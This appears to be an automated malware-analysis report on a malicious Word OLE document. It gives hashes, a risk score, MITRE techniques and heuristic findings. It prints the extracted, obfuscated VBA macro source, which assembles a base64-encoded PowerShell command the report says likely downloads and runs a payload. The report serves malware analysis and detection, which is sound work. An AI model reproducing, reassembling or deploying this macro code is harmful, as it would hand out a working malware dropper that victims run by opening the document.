Office (OLE) malware analysis — malicious · 039cf1e1fbca2123

MALICIOUS

Office (OLE)

66.7 KB First seen: 2019-04-18

MD5: 46efd35c8e2d43f9c5a38d2ce150a5f8 SHA-1: a3ce01521bcf99d1371249636ea1c2bfe48e5632 SHA-256: 039cf1e1fbca212339895b3dfe75f93305169773b2dfc9ea1f2eb8027af031f7

82 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing VBA macros. The macros are heavily obfuscated but appear to construct strings that likely form a command to download and execute a payload. The presence of an Autoopen macro marker and the obfuscated VBA code strongly suggest a macro-based malware delivery mechanism, commonly associated with spearphishing attachments.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 68,290 bytes but its declared streams total only 35,442 bytes — 32,848 bytes (48%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4807 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4807 bytes
SHA-256: `4ece2b85b5286b1bd737c0d1a212c16e38a19b7019a92e204a2db29a31f8d42d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "bwTLWpOY" Function vavKf() On Error Resume Next For dICLq = OZlvA To WfBBBr For NwmFD = PVciUv To 25666 uhPhSZ = (37697 / CBool(dwdhSi) - fEbUk / Oct(51965 / Hex(24235) / DwUaCm + Rnd(QAmBbw / Fix(37)))) Next TiSwiS = 77685 - 52977 Next UActTXViAj = "HeLL -e KAAgA" + "G4AZ" + "QB3AC0ATwBiAG" + "oARQ" + "BDAHQAIAAgAHMAe" For YlNwi = bcTiqL To wwQwmh For uRCKsk = BowtCb To 53368 pppMWZ = (20073 / CBool(tIbkjU) - hfGwcH / Oct(66209 / Hex(5890) / tBZnW + Rnd(njHCIb / Fix(37)))) Next aKDjj = 18080 - 3537 Next UwYrkJRk = "QBTAFQA" + "ZQBtAC4AaQBv" + "AC4AYwBPA" + "E0AUABy" + "AEUA" + "UwBTAEkATwBOA" + "C4AZABFAEYAT" + "AB" For zIjJP = vdzoH To lSVAWK For UrdhL = aFvus To 45133 Bltss = (59232 / CBool(arGIO) - pVIpD / Oct(25538 / Hex(47682) / jaWbV + Rnd(oJAiG / Fix(37)))) Next ilAYc = 14205 - 84073 Next zFFtsvok = "BAHQARQBz" + "AFQAcgBlAE" + "EAbQAoA" + "CA" For fdlVS = OFwGr To wUULXR For ZSQrX = zTDVj To 24126 VVZDpB = (16503 / CBool(qjMtr) - SNQoAL / Oct(69497 / Hex(34851) / OmOTVp + Rnd(jNtvJ / Fix(37)))) Next vRWWIL = 67732 - 67304 Next nbcQzZujuK = "AWwBz" + "AFkAUwBUAGUA" + "bQAuAEkAbwAuAG" + "0A" + "RQBt" + "AE" For zfbiG = jiALDk To QbhmV For zzzwQp = zSiDY To 67118 Joisq = (67832 / CBool(DitjG) - kAvoVp / Oct(7223 / Hex(67781) / zjKpo + Rnd(NEznUj / Fix(37)))) Next cspwm = 14740 - 92735 Next wmojz = "8AcgB5AHM" + "AdAByAGUAYQ" + "BNAF0AIABbAEMA" + "TwBuAHY" For GMKwh = XqhifS To qwiBu For pavvmJ = YCzZDw To 75045 rWAtGo = (81508 / CBool(PEpQw) - uHusXG / Oct(89380 / Hex(20519) / YnzaV + Rnd(IfjfSz / Fix(37)))) Next hInwzM = 61613 - 83594 Next uzuNScm = "ARQByAHQAXQ" + "A6" + "ADoAZgB" + "yAG" + "8ATQ" + "BiAGE" vavKf = UActTXViAj + UwYrkJRk + zFFtsvok + nbcQzZujuK + wmojz + uzuNScm End Function Function uzlGj() On Error Resume Next For sjnHri = YjqjF To FHNVWH For GlfmS = mEbHh To 58906 buPnN = (99195 / CBool(UKwcSV) - Cjiiq / Oct(46841 / Hex(36368) / HEBoSs + Rnd(zZICj / Fix(37)))) Next LrZHW = 58467 - 7175 Next LrqUMSv = "AUwBlADY" + "ANABzAHQAUgBJAG" + "4A" + "RwAoACcAVgB" + "aAEI" + "AdAB" + "TADgATQB3AEY" + "ASQBY" + "AC8AUwBqADQA" + "VQB1A" For mDTzTk = sdrGG To mLmYhl For MZTQp = qoIWT To 88374 uVBhr = (96941 / CBool(iEwQv) - PYjnj / Oct(79641 / Hex(86781) / jMjDHO + Rnd(jjGYMr / Fix(37)))) Next RKFjjd = 61468 - 15080 Next FGEmBMVtciC = "HEARgBMAGMAQwBx" + "AEsAUgBYAEQANA" + "BBAGoAcQBkA" + "DAAeQB" + "vADYARQBTAFIATg" + "A3" + "ADkAYgBVA" + "E4ASwB" For DUPqRI = mdAZK To RdkkN For VpsjiY = ViCGP To 18308 jjjrYc = (52931 / CBool(TuLRf) - sbwwQ / Oct(64410 / Hex(74198) / KkhRKm + Rnd(jXlQjZ / Fix(37)))) Next usLkWH = 41035 - 95485 Next azKSOZ = "uA" + "EoAWABkAHQAdAA3" + "AEwA" + "KwBiAF" + "QAaQBmADQA" + "SgB" + "TAFQA" + "MwBuAEgA" For QswdH = Hwcov To zKGRp For kXZBwj = jDnfK To 60337 NMRZM = (17717 / CBool(dQnoui) - vhFTh / Oct(62618 / Hex(71602) / wOvOWa + Rnd(USRJc / Fix(37)))) Next mtjFf = 89095 - 13185 Next PlXQwhjw = "TQ" + "BQAGUAWQBMAHoAe" + "AA" + "2AHAAVwA1" + "AEoAUgBvAHEASAB" + "zA" + "G0AeQBVAEUA" + "ZwBzAFYA" + "eQBuAHAAb" For mNBFq = WhMcwh To NCdzmG For vUWlCI = oZOCm To 58424 LBuJj = (78536 / CBool(mGoKuV) - rCHto / Oct(62017 / Hex(21657) / qQDhc + Rnd(IwaMDT / Fix(37)))) Next AjoGR = 88527 - 16943 Next jzqMjuLPU = "wBpAEMAMQA" + "xAFQAZgBYA" + "C8AKwBYADQA" + "bwBWAEQASwBPA" + "GcA" + "SQBrAEwANQBBAGM" + "AcQA0AGsAY" uzlGj = LrqUMSv + FGEmBMVtciC + azKSOZ + PlXQwhjw + jzqMjuLPU End Function Function SjuitMHdW() On Error Resume Next For haHnj = WGIzwI To KdGwLz For IOwrCW = SSmXmC To 9514 pvutk = (72107 / CBool(ROFKJp) - iIFud / Oct(10396 / Hex(37584) / QkNGDo + Rnd(aLFnB / Fix(37)))) Next KDSOtQ = 93707 - 68097 Next pBivWLvjZ = "QBJAHk" + "AQwBzAFIAcwBVAD" + "gAY" + "wBnADcAdwB3" For rMAMki = rYzpN To JfdhDv For tFVnSY = mjkoW To 86783 tAFrDs = (17 ... (truncated)

SHA-256: 4ece2b85b5286b1bd737c0d1a212c16e38a19b7019a92e204a2db29a31f8d42d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "bwTLWpOY"
Function vavKf()
On Error Resume Next
For dICLq = OZlvA To WfBBBr
      For NwmFD = PVciUv To 25666
         uhPhSZ = (37697 / CBool(dwdhSi) - fEbUk / Oct(51965 / Hex(24235) / DwUaCm + Rnd(QAmBbw / Fix(37))))
Next
   TiSwiS = 77685 - 52977
Next
UActTXViAj = "HeLL -e KAAgA" + "G4AZ" + "QB3AC0ATwBiAG" + "oARQ" + "BDAHQAIAAgAHMAe"
For YlNwi = bcTiqL To wwQwmh
      For uRCKsk = BowtCb To 53368
         pppMWZ = (20073 / CBool(tIbkjU) - hfGwcH / Oct(66209 / Hex(5890) / tBZnW + Rnd(njHCIb / Fix(37))))
Next
   aKDjj = 18080 - 3537
Next
UwYrkJRk = "QBTAFQA" + "ZQBtAC4AaQBv" + "AC4AYwBPA" + "E0AUABy" + "AEUA" + "UwBTAEkATwBOA" + "C4AZABFAEYAT" + "AB"
For zIjJP = vdzoH To lSVAWK
      For UrdhL = aFvus To 45133
         Bltss = (59232 / CBool(arGIO) - pVIpD / Oct(25538 / Hex(47682) / jaWbV + Rnd(oJAiG / Fix(37))))
Next
   ilAYc = 14205 - 84073
Next
zFFtsvok = "BAHQARQBz" + "AFQAcgBlAE" + "EAbQAoA" + "CA"
For fdlVS = OFwGr To wUULXR
      For ZSQrX = zTDVj To 24126
         VVZDpB = (16503 / CBool(qjMtr) - SNQoAL / Oct(69497 / Hex(34851) / OmOTVp + Rnd(jNtvJ / Fix(37))))
Next
   vRWWIL = 67732 - 67304
Next
nbcQzZujuK = "AWwBz" + "AFkAUwBUAGUA" + "bQAuAEkAbwAuAG" + "0A" + "RQBt" + "AE"
For zfbiG = jiALDk To QbhmV
      For zzzwQp = zSiDY To 67118
         Joisq = (67832 / CBool(DitjG) - kAvoVp / Oct(7223 / Hex(67781) / zjKpo + Rnd(NEznUj / Fix(37))))
Next
   cspwm = 14740 - 92735
Next
wmojz = "8AcgB5AHM" + "AdAByAGUAYQ" + "BNAF0AIABbAEMA" + "TwBuAHY"
For GMKwh = XqhifS To qwiBu
      For pavvmJ = YCzZDw To 75045
         rWAtGo = (81508 / CBool(PEpQw) - uHusXG / Oct(89380 / Hex(20519) / YnzaV + Rnd(IfjfSz / Fix(37))))
Next
   hInwzM = 61613 - 83594
Next
uzuNScm = "ARQByAHQAXQ" + "A6" + "ADoAZgB" + "yAG" + "8ATQ" + "BiAGE"
vavKf = UActTXViAj + UwYrkJRk + zFFtsvok + nbcQzZujuK + wmojz + uzuNScm
End Function
Function uzlGj()
On Error Resume Next
For sjnHri = YjqjF To FHNVWH
      For GlfmS = mEbHh To 58906
         buPnN = (99195 / CBool(UKwcSV) - Cjiiq / Oct(46841 / Hex(36368) / HEBoSs + Rnd(zZICj / Fix(37))))
Next
   LrZHW = 58467 - 7175
Next
LrqUMSv = "AUwBlADY" + "ANABzAHQAUgBJAG" + "4A" + "RwAoACcAVgB" + "aAEI" + "AdAB" + "TADgATQB3AEY" + "ASQBY" + "AC8AUwBqADQA" + "VQB1A"
For mDTzTk = sdrGG To mLmYhl
      For MZTQp = qoIWT To 88374
         uVBhr = (96941 / CBool(iEwQv) - PYjnj / Oct(79641 / Hex(86781) / jMjDHO + Rnd(jjGYMr / Fix(37))))
Next
   RKFjjd = 61468 - 15080
Next
FGEmBMVtciC = "HEARgBMAGMAQwBx" + "AEsAUgBYAEQANA" + "BBAGoAcQBkA" + "DAAeQB" + "vADYARQBTAFIATg" + "A3" + "ADkAYgBVA" + "E4ASwB"
For DUPqRI = mdAZK To RdkkN
      For VpsjiY = ViCGP To 18308
         jjjrYc = (52931 / CBool(TuLRf) - sbwwQ / Oct(64410 / Hex(74198) / KkhRKm + Rnd(jXlQjZ / Fix(37))))
Next
   usLkWH = 41035 - 95485
Next
azKSOZ = "uA" + "EoAWABkAHQAdAA3" + "AEwA" + "KwBiAF" + "QAaQBmADQA" + "SgB" + "TAFQA" + "MwBuAEgA"
For QswdH = Hwcov To zKGRp
      For kXZBwj = jDnfK To 60337
         NMRZM = (17717 / CBool(dQnoui) - vhFTh / Oct(62618 / Hex(71602) / wOvOWa + Rnd(USRJc / Fix(37))))
Next
   mtjFf = 89095 - 13185
Next
PlXQwhjw = "TQ" + "BQAGUAWQBMAHoAe" + "AA" + "2AHAAVwA1" + "AEoAUgBvAHEASAB" + "zA" + "G0AeQBVAEUA" + "ZwBzAFYA" + "eQBuAHAAb"
For mNBFq = WhMcwh To NCdzmG
      For vUWlCI = oZOCm To 58424
         LBuJj = (78536 / CBool(mGoKuV) - rCHto / Oct(62017 / Hex(21657) / qQDhc + Rnd(IwaMDT / Fix(37))))
Next
   AjoGR = 88527 - 16943
Next
jzqMjuLPU = "wBpAEMAMQA" + "xAFQAZgBYA" + "C8AKwBYADQA" + "bwBWAEQASwBPA" + "GcA" + "SQBrAEwANQBBAGM" + "AcQA0AGsAY"
uzlGj = LrqUMSv + FGEmBMVtciC + azKSOZ + PlXQwhjw + jzqMjuLPU
End Function
Function SjuitMHdW()
On Error Resume Next
For haHnj = WGIzwI To KdGwLz
      For IOwrCW = SSmXmC To 9514
         pvutk = (72107 / CBool(ROFKJp) - iIFud / Oct(10396 / Hex(37584) / QkNGDo + Rnd(aLFnB / Fix(37))))
Next
   KDSOtQ = 93707 - 68097
Next
pBivWLvjZ = "QBJAHk" + "AQwBzAFIAcwBVAD" + "gAY" + "wBnADcAdwB3"
For rMAMki = rYzpN To JfdhDv
      For tFVnSY = mjkoW To 86783
         tAFrDs = (17
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.